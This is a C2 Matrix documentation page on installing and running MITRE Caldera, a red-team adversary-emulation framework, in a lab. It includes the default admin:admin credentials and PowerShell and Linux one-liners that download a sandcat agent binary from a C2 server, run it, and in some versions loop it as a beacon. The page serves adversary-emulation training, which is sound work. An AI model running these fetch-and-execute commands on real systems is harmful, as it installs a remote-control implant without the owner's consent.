C2 Matrix
  • The C2 Matrix
  • About
  • SANS Slingshot C2 Matrix VM
  • Contribute
  • Feedback
  • Lab Infrastructure
    • C2 Matrix Eval Lab
    • Basic Lab
    • Virtual Machines with C2s
    • Docker
    • Resources
  • C2
    • Caldera
    • Covenant
    • Deimos
    • Empire3
    • Empire5
    • Havoc
    • ibombshell
    • Koadic
    • Merlin
    • Mythic
    • Nuages
    • PoshC2
    • PowerHub
    • SilentTrinity
    • Sliver
    • SCYTHE
    • TrevorC2
  • Attack Infrastructure
    • Resources
    • Redirectors/Relays
  • Detection
    • Basics
    • Beacons
    • JA3/JA3S Hashes
    • JARM
Powered by GitBook
On this page
  • Install Caldera
  • Run Caldera
  • Deploy Agent
  • Understanding Caldera

Was this helpful?

  1. C2

Caldera

Install Caldera

Ensure Docker is installed first. Run as root

cd /opt
sudo git clone https://github.com/mitre/caldera.git --recursive
cd caldera
sudo ./install.sh --kali

Run Caldera

cd /opt/caldera
source calderaenv/bin/activate
python server.py

http://127.0.0.1:8888
admin:admin

Deploy Agent

Windows

$url="http://192.168.120.135:8888/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://192.168.120.135:8888 -group my_group;
OR
while($true) {$url="http://192.168.120.135:443/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file","sandcat.exe");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe http://192.168.120.135:443 my_group; sleep 60}

Linux

while true; do curl -sk -X POST -H 'file:sandcat-linux' http://localhost:8888/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux http://localhost:8888 my_group; sleep 60; done

Understanding Caldera

PreviousResourcesNextCovenant

Last updated 5 years ago

Was this helpful?

This graphic created by

Presentation from Erik van Buggenhout:

Caldera YouTube Playlist:

Adam Mashinchi
https://www.slideshare.net/erikvanbuggenhout/adversary-emulation-using-caldera
https://www.youtube.com/playlist?list=PLkTApXQou_8KFTzR7KqDJh-ndMO39PYnB